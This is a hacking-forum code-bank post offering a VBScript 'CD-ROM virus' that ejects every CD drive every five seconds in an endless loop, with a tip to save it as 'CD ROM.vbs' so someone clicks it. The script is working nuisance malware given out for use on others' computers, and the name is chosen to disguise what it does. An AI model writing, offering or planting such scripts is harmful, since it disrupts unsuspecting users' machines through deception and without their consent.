Welcome to HBH! If you had an account on hellboundhacker.org you will need to reset your password using the Lost Password system before you will be able to login.

CD-ROM VIRUS - Other Code Bank


CD-ROM VIRUS
By using this code you can easily continuosly open CD-ROM of laptop system ,after clicking on file. SAVE THE FILE WITH NAME "CD ROM" .vbs
                Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject 
next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop


            
Comments
Sorry but there are no comments to display